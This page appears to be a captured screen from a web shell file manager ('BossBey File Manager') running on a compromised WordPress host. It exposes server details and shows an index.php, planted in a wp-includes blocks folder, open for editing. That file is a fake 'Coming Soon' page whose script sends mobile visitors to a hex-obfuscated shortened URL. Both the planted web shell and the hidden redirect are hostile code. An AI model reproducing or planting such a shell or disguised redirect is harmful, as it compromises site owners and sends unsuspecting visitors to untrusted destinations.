BossBey File Manager
PHP:
8.1.34
OS:
Linux
User:
ebookghostwritin
Root
/
home
/
demodesignproboa
/
public_html
/
Iconconstruction
/
wp-includes
/
blocks
/
post-comments-count
📤 Upload
📝 New File
📁 New Folder
Close
Editing: index.php
<!DOCTYPE html> <html lang="ar"> <head> <meta charset="UTF-8"> <title>Coming Soon</title> <style> body { display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background-color: #f0f6fc; font-family: Arial, sans-serif; text-align: center; color: #21759b; } h1 { font-size: 7em; margin: 0; } p { font-size: 1.5em; margin-top: 0.5em; } </style> </head> <body> <div> <h1>WordPress</h1> <p><b>Coming Soon</b></p> </div> <script> document.addEventListener("DOMContentLoaded", function() { if (/Mobi|Android|iPhone|iPad|iPod|IEMobile|Opera Mini/i.test(navigator.userAgent)) { window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x7a\x4f\x6d\x6f\x6d\x77\x51\x30\x72\x30"; } }); </script> </body> </html>
Save
Cancel